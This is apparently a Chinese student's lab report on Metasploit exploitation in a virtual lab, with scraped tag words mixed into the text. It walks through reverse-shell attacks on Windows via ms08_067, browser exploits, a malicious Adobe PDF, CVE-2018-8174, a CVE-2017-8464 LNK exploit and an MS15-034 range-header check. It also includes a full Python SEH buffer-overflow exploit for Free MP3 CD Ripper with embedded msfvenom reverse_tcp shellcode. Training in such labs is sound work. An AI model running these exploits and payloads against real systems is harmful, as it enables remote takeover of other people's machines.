目录python
1.1一个主动攻击实践,如ms08_067; (1分)git
1.2 一个针对浏览器的攻击,如ms11_050;(1分)github
1.3 一个针对客户端的攻击,如Adobe;(1分)shell
1.4 成功应用任何一个辅助模块。(0.5分)windows
(1)用本身的话解释什么是exploit,payload,encode.api
1.先用search ms08_067指令查询一下针对该漏洞能够运用的攻击模块:
浏览器
2.用use exploit/windows/smb/ms08_067_netapi
使用该模块,再使用show payloads查看能够供咱们使用的payload
安全
3.咱们的目的是为了获取靶机的shell,所以这里咱们选择经过反向链接来获取shell的generic/shell_reverse_tcp当payload,使用指令set payload generic/shell_reverse_tcp
对payload进行设置:
服务器
4.接着使用指令show options查看咱们须要设置的参数,发现须要设置一个RHOST(远程主机,即靶机的IP地址)和一个LHOST(本地主机,即攻击机的IP地址):
网络
5.show targets 查看这个漏洞波及的系统版本共71个,主要是xp和2003。咱们也能够经过修改target的值,来选择咱们具体想要攻击的计算机系统(一般能够采用自动选取,即target设置为0)
6.接着使用exploit指令开始攻击,攻击成功后获取了靶机的shell,使用dir指令查看目录文件:
一开始用的老师给的xp中文版虚拟机,结果一直提示没有创建会话:
从学姐那拷了英文版的xp,后面就没有出现相似问题。
search ms11_050 搜索漏洞 use windows/browser/ms10_046_shortcut_icon_dllloader 使用漏洞 show payloads 显示可用攻击载荷 set payload windows/meterpreter/reverse_tcp 选择攻击载荷 options 查看配置信息 set LHOST [ip] 设置监听地址 set 设置监听端口 set 设置攻击Ip exploit 开始攻击,并在靶机打开msf给的http网址 sessions -i num 查看开启的会话
search ms14_064 搜索漏洞 use windows/browser/ms14_064_ole_code_execution 使用漏洞 show payloads 显示可用攻击载荷 set payload windows/meterpreter/reverse_tcp 选择攻击载荷 options 查看配置信息 set LHOST 192.168.19.129 设置监听地址 set LPORT 5230 设置监听端口 set URIPATH tky 设置url域名 exploit 开始攻击,并在靶机打开IE浏览器输入生成的网址,kali的8080端口监听得到链接,创建会话 sessions -i num 查看开启的会话
1.根据本身的需求选择攻击模块,将其载入。选用exploit/windows/fileformat/adobe_toolbutton
2.使用命令show payloads
选择要使用的payload(这里使用了windows/meterpreter/reverse_http
)
3.使用命令show options
查看相关参数设置要求
4.设置好相应参数后,开始实施攻击,发如今/root/.msf4/local/
目录下成功生成了一个5230.pdf文件:
5.而后将该文件传送到靶机上(经过共享文件夹)而且在攻击机上打开监听
6.将靶机中的pdf文件打开,攻击机成功获取到靶机shell:
最开始下载了adobe9.3,可是攻击不成功,老是会闪退
从新下载了adobe的版本——9.0便可
1.首先到GitHub上下载用于该漏洞的攻击模块https://github.com/0x09AL/CVE-2018-8174-msf.git
2.下载到kali之中并查看一下目录是否成功下载,将CVE-2018-8174.rb复制到 fileformat 目录/:
cd CVE-2018-8174-msf/ cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/ /*将CVE-2018-8174.rtf复制到 exploits 目录*/ cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
use exploit/windows/fileformat/cve_2018_8174 set PAYLOAD windows/meterpreter/reverse_tcp set srvhost 192.168.19.129 set lhost 192.168.19.129 exploit
用靶机的 IE 浏览器打开恶意 URL,显示链接成功,可是没有返回shell
最开始会弹此文档包含的链接可能引用了其余文件,觉得有机会成功,可是不论选“是”仍是“否”,最后都会弹内存不足
看来这个漏洞已经被修复了。试了不少遍,在WIN7里和WIN10里都试过,仍是没能成功
最开始用CP命令拷贝文件到相应的文件夹下后,执行msfconsole会报错
看了一下报错的内容,最后一句意思大概意思是要使用小写,修改之后可正常执行
此处必定要将.rb文件名中的CVE变为小写,.crt不变
靶机:Win7
在开始以前先经过命令search CVE:2018 type:exploit
找了一下CVE-2017和2018漏洞有哪些,其实不少英文参数看不懂,这时候百度就是个好东西,有不少漏洞要不就是涉及的知识我不懂,要不就是它须要的环境和软件我下载不下来,挑来选去选中了这个漏洞
打开终端
msfconsole use exploit/windows/fileformat/cve_2017_8464_lnk_rce set payload windows/meterpreter/reverse_tcp show options set LHOST 192.168.19.129 exploit
use multi/handler set paylaod windows/meterpreter/reverse_tcp set LHOST192.168.19.129 exploit
Free MP3 CD Ripper是一款音频格式转换器。Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码
靶机:Win10
利用msf生成反向链接的shellcode,
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.129 lport=7230 -f c --smallest
# Stack-based buffer overflow in Free MP3 CD Ripper 2.6 buffer = "A" * 4116 NSEH = "\xeb\x06\x90\x90" SEH = "\x84\x20\xe4\x66" nops = "\x90" * 5 buf = "" buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30" buf += "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" buf += "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52" buf += "\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1" buf += "\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b" buf += "\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03" buf += "\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b" buf += "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24" buf += "\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb" buf += "\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c" buf += "\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54" buf += "\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x13\x81" buf += "\x68\x02\x00\x1c\x3e\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5" buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0" buf += "\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8" buf += "\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00" buf += "\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" buf += "\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x75\xee\xc3"; pad = "B" * (316 - len(nops) - len(buf) ) payload = buffer + NSEH + SEH + nops + buf +pad try: f=open("TestFMCR.mp3","w") print "[+] Creating %s bytes mp3 File..." %len(payload) f.write(payload) f.close() print "[+] mp3 File created successfully!" except: print "File cannot be created!"
2.运行脚本,生成恶意mp3文件,python FmcrExploit.py
3.移动恶意文件到靶机windows10上
4.打开msf并设置监听
在主机上打开Free MP3 CD Ripper软件
回连成功!
在正式攻击以前能够先用auxiliary中的扫描端口模块扫描受害机开发的端口
首先须要安装IIS服务
win12安装好iis服务后访问80端口,检测是否存在漏洞:使用curl发送如下数据curl http://192.168.19.148 -H "Host: 192.168.19.148" -H "Range: bytes=0-18446744073709551615"
当出现Requested Range Not Satisfiable时说明存在漏洞。
在msf中执行过程以下,原理与以前的同样
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump show options set rhosts 192.168.19.148 set threads 10 exploit